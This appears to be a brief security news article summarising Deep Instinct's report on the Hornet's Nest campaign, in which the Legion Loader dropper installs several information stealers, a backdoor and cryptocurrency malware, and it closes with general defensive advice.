A malware distribution campaign has been detected by researchers at Deep Instinct which is delivering a package of 6 malware variants in one hit. The malware includes a backdoor, cryptojacker, cryptocurrency stealer, and information stealing Trojans.
Deep Instinct has called the campaign Hornet’s Nest due to the sheer number of threats being delivered. The campaign starts with the delivery of a malware dropper dubbed Legion Loader, which is believed to have been developed by a Russian language speaker, although it is not known if the threat actors behind the campaign are based in Russia. The targets so far are mostly located in the United States and Europe.
Once installed, the MS Visual C++ 8 malware dropper will deliver its malicious payloads using PowerShell commands. The payloads are Predator the Thief, which can capture webcam footage, the Vidar information stealer, and the highly customizable information stealer, Racoon Stealer. An RDP-based backdoor is also delivered, which gives the attackers access to the compromised machine, and a cryptocurrency miner and PowerShell cryptocurrency stealer are downloaded. Legion Loader appears to be under active development and uses a variety of methods to avoid detection by sandboxes.
Deep Instinct researchers believe the aim of the campaign is to infect businesses with multiple malware variants which could then be offered under cybercrime-as-a-service. The package of malware variants also allows the attackers to steal large volumes of sensitive personal data which could be sold on darknet marketplaces or used for further attacks on the organization. Legion Loader may not be particularly sophisticated, but it can cause a considerable amount of harm.
The researchers are currently unclear about how the Legion Loader dropper is being delivered. To protect against attacks, standard cybersecurity best practices should be followed, such as applying patches promptly, securing internet-facing ports, using advanced email security solutions to block malspam, and using a web filter to block exploit kits and other malicious websites.